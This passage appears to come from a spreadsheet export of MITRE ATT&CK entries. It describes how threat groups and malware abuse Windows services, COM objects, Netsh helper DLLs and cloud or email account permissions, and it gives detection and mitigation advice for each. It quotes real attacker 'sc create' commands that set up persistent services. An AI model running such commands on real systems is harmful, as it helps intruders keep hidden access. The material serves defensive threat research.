During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors modified the `IKEEXT` and `PrintNotify` Windows services for persistence.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors installed DLLs and backdoors as Windows services.(Citation: McAfee Honeybee)
APT19
An [APT19](https://attack.mitre.org/groups/G0073) Port 22 malware variant registers itself as a service.(Citation: Unit 42 C0d0so0 Jan 2016)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that creates a new service for persistence.(Citation: FireEye Operation Double Tap)
APT32
[APT32](https://attack.mitre.org/groups/G0050) modified Windows Services to ensure PowerShell scripts were loaded on the system. [APT32](https://attack.mitre.org/groups/G0050) also creates a Windows service to establish persistence.(Citation: ESET OceanLotus)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has installed a new Windows service to establish persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) modified legitimate Windows services to install malware backdoors.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) created the StorSyncSvc service to provide persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has made their XMRIG payloads persistent as a Windows Service.(Citation: RedCanary Mockingbird May 2020)
Carbanak
[Carbanak](https://attack.mitre.org/groups/G0008) malware installs itself as a service to provide persistence and SYSTEM privileges.(Citation: Kaspersky Carbanak)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has created new services to establish persistence.(Citation: Group IB Cobalt Aug 2017)
DarkVishnya
[DarkVishnya](https://attack.mitre.org/groups/G0105) created new services for shellcode loaders distribution.(Citation: Securelist DarkVishnya Dec 2018)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) created a service using the command &lt;code&gt;sc create “SysUpdate” binpath= “cmd /c start “[file path]””&amp;&amp;sc config “SysUpdate” start= auto&amp;&amp;net
start SysUpdate&lt;/code&gt; for persistence.(Citation: TrendMicro EarthLusca 2022)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) created new Windows services and added them to the startup directories for persistence.(Citation: FireEye FIN7 Aug 2018)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) backdoor RoyalDNS established persistence through adding a service called &lt;code&gt;Nwsapagent&lt;/code&gt;.(Citation: NCC Group APT15 Alive and Strong)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has created new services for persistence.(Citation: Securelist Kimsuky Sept 2013)(Citation: CISA AA20-301A Kimsuky)
Lazarus Group
Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families install themselves as new services.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)
PROMETHIUM
[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created new services and modified existing services for persistence.(Citation: Bitdefender StrongPity June 2020)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used malware that adds cryptocurrency miners as a service.(Citation: ATT TeamTNT Chimaera September 2020)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027)'s malware can create a new service, sometimes naming it after the config information, to gain persistence.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Lunghi Iron Tiger Linux)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has installed a service pointing to a malicious DLL dropped to disk.(Citation: PWC KeyBoys Feb 2017)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has installed [TrickBot](https://attack.mitre.org/software/S0266) as a service named ControlServiceA in order to establish persistence.(Citation: CrowdStrike Grim Spider May 2019)(Citation: Mandiant FIN12 Oct 2021) 
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can establish persistence by creating a service.(Citation: Cyberreason Anchor December 2019)	
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) can install itself as a service.(Citation: CISA AppleJeus Feb 2021) 
Attor
[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence by registering a new service.(Citation: ESET Attor Oct 2019)
AuditCred
[AuditCred](https://attack.mitre.org/software/S0347) is installed as a new service on the system.(Citation: TrendMicro Lazarus Nov 2018)
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) can modify service configurations.(Citation: Palo Alto Networks BBSRAT)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) can terminate a specific process by its process id.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has been modified to be used as a Windows service.(Citation: Talos Bisonal Mar 2020) 
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) has attempted to install itself as a service to maintain persistence.(Citation: Crowdstrike Indrik November 2018)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can create a new service to establish persistence.(Citation: Minerva Labs Black Basta May 2022)(Citation: Avertium Black Basta June 2022)
BlackEnergy
One variant of [BlackEnergy](https://attack.mitre.org/software/S0089) creates a new service using either a hard-coded or randomly generated name.(Citation: F-Secure BlackEnergy 2014)
Briba
[Briba](https://attack.mitre.org/software/S0204) installs a service pointing to a malicious DLL dropped to disk.(Citation: Symantec Briba May 2012)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) establishes persistence by creating a service and naming it based off the operating system version running on the current machine.(Citation: ESET Carbon Mar 2017)
Catchamas
[Catchamas](https://attack.mitre.org/software/S0261) adds a new service named NetAdapter to establish persistence.(Citation: Symantec Catchamas April 2018)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can register itself as a system service to gain persistence.(Citation: Talent-Jump Clambling February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can install a new service.(Citation: Cobalt Strike TTPs Dec 2017)
Conficker
[Conficker](https://attack.mitre.org/software/S0608) copies itself into the &lt;code&gt;%systemroot%\system32&lt;/code&gt; directory and registers as a service.(Citation: SANS Conficker)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) uses Windows services typically named "javamtsup" for persistence.(Citation: F-Secure Cosmicduke)
CozyCar
One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to register itself as a Windows service.(Citation: F-Secure CozyDuke)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) can modify services by using the &lt;code&gt;OpenService&lt;/code&gt; and &lt;code&gt;ChangeServiceConfig&lt;/code&gt; functions.(Citation: McAfee Cuba April 2021) 
DCSrv
[DCSrv](https://attack.mitre.org/software/S1033) has created new services for persistence by modifying the Registry.(Citation: Checkpoint MosesStaff Nov 2021)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) can add a service called WBService to establish persistence.(Citation: CyberBit Dtrack)
Duqu
[Duqu](https://attack.mitre.org/software/S0038) creates a new service that loads a malicious driver when the system starts. When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key.(Citation: Symantec W32.Duqu)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) registers itself as a service by adding several Registry keys.(Citation: Symantec Dyre June 2015)
Elise
[Elise](https://attack.mitre.org/software/S0081) configures itself as a service.(Citation: Lotus Blossom Jun 2015)
Emissary
[Emissary](https://attack.mitre.org/software/S0082) is capable of configuring itself as a service.(Citation: Emissary Trojan Feb 2016)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed creating new services to maintain persistence.(Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018)(Citation: Binary Defense Emotes Wi-Fi Spreader) 
Empire
[Empire](https://attack.mitre.org/software/S0363) can utilize built-in modules to modify service binaries and restore them to their original state.(Citation: Github PowerShell Empire)
Exaramel for Windows
The [Exaramel for Windows](https://attack.mitre.org/software/S0343) dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV.”(Citation: ESET TeleBots Oct 2018)
FALLCHILL
[FALLCHILL](https://attack.mitre.org/software/S0181) has been installed as a Windows service.(Citation: CISA AppleJeus Feb 2021)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) creates a new Windows service with the malicious executable for persistence.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) has established persistence by running `sc.exe` and by setting the `WSearch` service to run automatically.(Citation: Bitdefender FunnyDream Campaign November 2020)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can drop itself in `C:\Windows\System32\spool\prtprocs\x64\winprint.dll` as an alternative Print Processor to be loaded automatically when the spoolsv Windows service starts.(Citation: ESET Gelsemium June 2021)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493) has established persistence by running in the background as an autostart service.(Citation: Trustwave GoldenSpy June 2020)	
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) chooses a service, drops a DLL file, and writes it to that serviceDLL Registry key.(Citation: ESET GreyEnergy Oct 2018)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) can load drivers by creating a new service using the `CreateServiceW` API.(Citation: Crowdstrike DriveSlayer February 2022)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates new services to establish persistence.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)(Citation: Symantec Hydraq Persistence Jan 2010)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604) can use an arbitrary system service to load at system boot for persistence and replaces the ImagePath registry value of a Windows service with a new backdoor binary.(Citation: Dragos Crashoverride 2017) 
InnaputRAT
Some [InnaputRAT](https://attack.mitre.org/software/S0259) variants create a new Windows service to establish persistence.(Citation: ASERT InnaputRAT April 2018)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence.(Citation: ESET InvisiMole June 2020)
JHUHUGIT
[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered itself as a service to establish persistence.(Citation: ESET Sednit Part 1)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has registered itself as a service using its export function.(Citation: Malwarebytes Konni Aug 2021) 
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) can install itself as a new service.(Citation: Unit 42 Kazuar May 2017)
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) installs a service pointing to a malicious DLL dropped to disk.(Citation: Rapid7 KeyBoy Jun 2013)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) creates a new service named WmiApSrvEx to establish persistence.(Citation: Symantec Orangeworm April 2018)
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.(Citation: ESET LoudMiner June 2019)
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.(Citation: Palo Alto MoonWind March 2017)
Naid
[Naid](https://attack.mitre.org/software/S0205) creates a new service to establish.(Citation: Symantec Naid June 2012)
Nebulae
[Nebulae](https://attack.mitre.org/software/S0630) can create a service to establish persistence.(Citation: Bitdefender Naikon April 2021)
Nerex
[Nerex](https://attack.mitre.org/software/S0210) creates a Registry subkey that registers a new service.(Citation: Symantec Nerex May 2012)
Nidiran
[Nidiran](https://attack.mitre.org/software/S0118) can create a new service named msamger (Microsoft Security Accounts Manager).(Citation: Symantec Backdoor.Nidiran)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) has created a Windows service named `WmdmPmSp` to establish persistence.(Citation: MoustachedBouncer ESET August 2023)
Okrum
To establish persistence, [Okrum](https://attack.mitre.org/software/S0439) can install itself as a new service named NtmSsvc.(Citation: ESET Okrum July 2019)
Pandora
[Pandora](https://attack.mitre.org/software/S0664) has the ability to gain system privileges through Windows services.(Citation: Trend Micro Iron Tiger April 2021)
PingPull
[PingPull](https://attack.mitre.org/software/S1031) has the ability to install itself as a service.(Citation: Unit 42 PingPull Jun 2022)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) can establish persistence by registering a malicious DLL as an alternative Print Processor which is loaded when the print spooler service starts.(Citation: ESET PipeMon May 2020)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) can be added as a service to establish persistence. [PlugX](https://attack.mitre.org/software/S0013) also has a module to change service configurations as well as start, control, and delete services.(Citation: CIRCL PlugX March 2013)(Citation: Lastline PlugX Analysis)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: Proofpoint ZeroT Feb 2017)
PoisonIvy
[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry subkey that registers a new service. [PoisonIvy](https://attack.mitre.org/software/S0012) also creates a Registry entry modifying the Logical Disk Manager service to point to a malicious DLL dropped to disk.(Citation: Symantec Darkmoon Aug 2005)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
PsExec
[PsExec](https://attack.mitre.org/software/S0029) can leverage Windows services to escalate privileges from administrator to SYSTEM with the &lt;code&gt;-s&lt;/code&gt; argument.(Citation: Russinovich Sysinternals)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can remotely create a temporary service on a target host.(Citation: NCC Group Black Basta June 2022)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) has created a service when it is installed on the victim machine.(Citation: Unit42 RDAT July 2020)	
Ragnar Locker
[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to create a new service for the VirtualBox driver.(Citation: Sophos Ragnar May 2020)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) can use services to establish persistence.(Citation: Bitdefender Naikon April 2021)
RawPOS
[RawPOS](https://attack.mitre.org/software/S0169) installs itself as a service to maintain persistence.(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)
Reaver
[Reaver](https://attack.mitre.org/software/S0172) installs itself as a new service.(Citation: Palo Alto Reaver Nov 2017)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can establish persistence by creating a new service.(Citation: GitHub SILENTTRINITY Modules July 2019)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has created a service on victim machines named "TaskFrame" to establish persistence.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
STARWHALE
[STARWHALE](https://attack.mitre.org/software/S1037) has the ability to create the following Windows service to establish persistence on an infected host: `sc create Windowscarpstss binpath= "cmd.exe /c cscript.exe c:\\windows\\system32\\w7_1.wsf humpback_whale" start= "auto" obj= "LocalSystem"`.(Citation: Mandiant UNC3313 Feb 2022)
SUGARUSH
[SUGARUSH](https://attack.mitre.org/software/S1049) has created a service named `Service1` for persistence.(Citation: Mandiant UNC3890 Aug 2022)
Sakula
Some [Sakula](https://attack.mitre.org/software/S0074) samples install themselves as services for persistence by calling WinExec with the &lt;code&gt;net start&lt;/code&gt; argument.(Citation: Dell Sakula)
Seasalt
[Seasalt](https://attack.mitre.org/software/S0345) is capable of installing itself as a service.(Citation: Mandiant APT1 Appendix)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” to execute the payload. Newer versions create the "MaintenaceSrv" and "hdv_725x" services.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444) has installed a Windows service to maintain persistence on victim machines.(Citation: FOX-IT May 2016 Mofang)
StreamEx
[StreamEx](https://attack.mitre.org/software/S0142) establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.(Citation: Cylance Shell Crew Feb 2017)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) has created new services and modified existing services for persistence.(Citation: Talos Promethium June 2020)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) uses a driver registered as a boot start service as the main load-point.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) can create a service to establish persistence.(Citation: Trend Micro Iron Tiger April 2021)
TDTESS
If running as administrator, [TDTESS](https://attack.mitre.org/software/S0164) installs itself as a new service named bmwappushservice to establish persistence.(Citation: ClearSky Wilted Tulip July 2017)
TEARDROP
[TEARDROP](https://attack.mitre.org/software/S0560) ran as a Windows service from the &lt;code&gt;c:\windows\syswow64&lt;/code&gt; folder.(Citation: Check Point Sunburst Teardrop December 2020)(Citation: FireEye SUNBURST Backdoor December 2020)
TYPEFRAME
[TYPEFRAME](https://attack.mitre.org/software/S0263) variants can add malicious DLL modules as new services.[TYPEFRAME](https://attack.mitre.org/software/S0263) can also delete services from the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)
ThreatNeedle
[ThreatNeedle](https://attack.mitre.org/software/S0665) can run in memory and register its payload as a Windows service.(Citation: Kaspersky ThreatNeedle Feb 2021)
TinyZBot
[TinyZBot](https://attack.mitre.org/software/S0004) can install as a Windows service for persistence.(Citation: Cylance Cleaver)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) establishes persistence by creating an autostart service that allows it to run whenever the machine boots.(Citation: Trend Micro Trickbot Nov 2018)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) has registered a service, typically named `WerFaultSvc`, to decrypt and find a kernel driver and kernel driver loader to maintain persistence.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has registered itself as a system service in the Registry for automatic execution at system startup.(Citation: TrendMicro PE_URSNIF.A2)
Volgmer
[Volgmer](https://attack.mitre.org/software/S0180) installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. Some [Volgmer](https://attack.mitre.org/software/S0180) variants also install .dll files as services with names generated by a list of hard-coded strings.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) creates the service "mssecsvc2.0" with the display name "Microsoft Security Center (2.0) Service."(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) created and established a service that runs until the encryption process is complete.(Citation: NCC Group WastedLocker June 2020) 
Wiarp
[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can create a service.(Citation: Symantec Wiarp May 2012)
Wingbird
[Wingbird](https://attack.mitre.org/software/S0176) uses services.exe to register a new autostart service named "Audit Service" using a copy of the local lsass.exe file.(Citation: Microsoft SIR Vol 21)(C</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by Netsh Helper DLLs.
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Process Creation
It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior.
Windows Registry Key Modification
Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)
netsh
[netsh](https://attack.mitre.org/software/S0108) can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed.(Citation: Demaske Netsh Persistence)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by the execution of tainted binaries.
File Metadata
Changes to binaries that do not line up with application updates or patches are also extremely suspicious.
File Modification
Monitor file systems for changes to application binaries and invalid checksums/signatures.
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Process Creation
Monitor processes for those that may be used to modify binary headers.
Audit
Binaries can also be baselined for what dynamic libraries they require, and if an app requires a new dynamic library that wasn\u2019t included as part of an update, it should be investigated.
Code Signing
Enforce that all binaries be signed by the correct Apple Developer IDs.
Execution Prevention
Allow applications via known hashes.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may be related to abuse of installer packages, including malicious commands triggered by application installations.
File Creation
Monitor creation of files associated with installer packages that may be abused for malicious execution.
Process Creation
Monitor processes with arguments that may be related to abuse of installer packages, including malicious, likely elevated processes triggered by application installations.
AppleJeus
During [AppleJeus](https://attack.mitre.org/software/S0584)'s installation process, it uses `postinstall` scripts to extract a hidden plist from the application's `/Resources` folder and execute the `plist` file as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) with elevated permissions.(Citation: ObjectiveSee AppleJeus 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Enable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None._x005F_x000D_
_x005F_x000D_
A larger than normal volume of emails sent from an account and similar phishing emails sent from real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.
Group Modification
Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions (including memberships in privileged groups) being granted to compromised accounts.
User Account Modification
Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
Disable or Remove Feature or Program
If email delegation is not required, disable it. In Google Workspace this can be accomplished through the Google Admin console.(Citation: Gmail Delegation)
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts.
Privileged Account Management
Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) added their own devices as allowed IDs for active sync using `Set-CASMailbox`, allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals.(Citation: Volexity SolarWinds)(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: MSTIC Nobelium Oct 2021)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used a Powershell cmdlet to grant the &lt;code&gt;ApplicationImpersonation&lt;/code&gt; role to a compromised account.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used a compromised global administrator account in Azure AD to backdoor a service principal with `ApplicationImpersonation` rights to start collecting emails from targeted mailboxes; [APT29](https://attack.mitre.org/groups/G0016) has also used compromised accounts holding `ApplicationImpersonation` rights in Exchange to collect emails.(Citation: Mandiant APT29 Microsoft 365 2022)(Citation: Mandiant APT29 Eye Spy Email Nov 22)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations.(Citation: FireEye APT35 2018) 
</t>
  </si>
  <si>
    <t xml:space="preserve">User Account Modification
Collect usage logs from accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to high-privileged cluster roles that go over a certain threshold of known admins. 
Multi-factor Authentication
Require multi-factor authentication for user accounts integrated into container clusters through cloud deployments or via authentication protocols such as LDAP or SAML. 
User Account Management
Ensure that low-privileged accounts do not have permissions to add permissions to accounts or to update container cluster roles. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by a file type association.
Process Creation
Monitor for newly executed processes that may establish persistence by executing malicious content triggered by a file type association.
Windows Registry Key Modification
Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. User file association preferences are stored under &lt;code&gt; [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts&lt;/code&gt; and override associations configured under &lt;code&gt;[HKEY_CLASSES_ROOT]&lt;/code&gt;. Changes to a user's preference will occur under this entry's subkeys.
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has a HWP document stealer module which changes the default program association in the registry to open HWP documents.(Citation: Securelist Kimsuky Sept 2013)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can conduct an image hijack of an `.msc` file extension as part of its UAC bypass process.(Citation: GitHub SILENTTRINITY Modules July 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">User Account Modification
Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. Monitor for updates to IAM policies and roles attached to user accounts.
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts.
Privileged Account Management
Ensure that all accounts use the least privileges they require. In Azure AD environments, consider using Privileged Identity Management (PIM) to define roles that require two or more approvals before assignment to users.(Citation: Microsoft Requests for Azure AD Roles in Privileged Identity Management)
User Account Management
Ensure that low-privileged user accounts do not have permissions to add permissions to accounts or update IAM policies.
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used IAM manipulation to gain persistence and to assume or elevate privileges.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) granted `company administrator` privileges to a newly created service principle.(Citation: CrowdStrike StellarParticle January 2022)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has added the global admin role to accounts they have created in the targeted organization's cloud instances.(Citation: MSTIC DEV-0537 Mar 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">User Account Modification
Monitor for unexpected changes to cloud user accounts, such as Azure Activity Logs highlighting malicious Service Principal and Application modifications. 
Monitor for the use of API and CLI commands that add access keys or tokens to accounts, such as &lt;code&gt;CreateAccessKey&lt;/code&gt; or &lt;code&gt;GetFederationToken&lt;/code&gt; in AWS or &lt;code&gt;service-accounts keys create&lt;/code&gt; in GCP. Also monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account. 
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts. Consider enforcing multi-factor authentication for the &lt;code&gt;CreateKeyPair&lt;/code&gt; and &lt;code&gt;ImportKeyPair&lt;/code&gt; API calls through IAM policies.(Citation: Expel IO Evil in AWS)
Network Segmentation
Configure access controls and firewalls to limit access to critical systems and domain controllers. Most cloud environments support separate virtual private cloud (VPC) instances that enable further segmentation of cloud systems.
Privileged Account Management
Do not allow domain administrator or root accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.
User Account Management
Ensure that low-privileged user accounts do not have permission to add access keys to accounts. In AWS environments, prohibit users from calling the `sts:GetFederationToken` API unless explicitly required.(Citation: Crowdstrike AWS User Federation Persistence)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used aws_consoler  to create temporary federated credentials for fake users in order to obfuscate which AWS credential is compromised and enable pivoting from the AWS CLI to console sessions without MFA.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) added credentials to OAuth Applications and Service Principals.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: CrowdStrike StellarParticle January 2022)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can generate SSH and API keys for AWS infrastructure and additional API keys for other IAM users.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
Note: Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on changes to COM registry keys, including HKCU\Software\Classes\CLSID\*.
Module Load
Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.
Process Creation
Monitor newly executed processes that may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
Windows Registry Key Modification
There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\Software\Classes\CLSID\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated.
&lt;h4&gt; Analytic 1 : Component Object Model Hijacking &lt;/h4&gt;
&lt;code&gt; clsid_keys = filter registry_keys where ((event_id == "12" OR event_id == "13" event_id == "14") AND
  key = "*\Software\Classes\CLSID\*")&lt;/code&gt;
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used COM hijacking for persistence by replacing the legitimate &lt;code&gt;MMDeviceEnumerator&lt;/code&gt; object with a payload.(Citation: ESET Sednit Part 1)(Citation: ESET Zebrocy May 2019)
ADVSTORESHELL
Some variants of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) achieve persistence by registering the payload as a Shell Icon Overlay handler COM object.(Citation: ESET Sednit Part 2)
BBSRAT
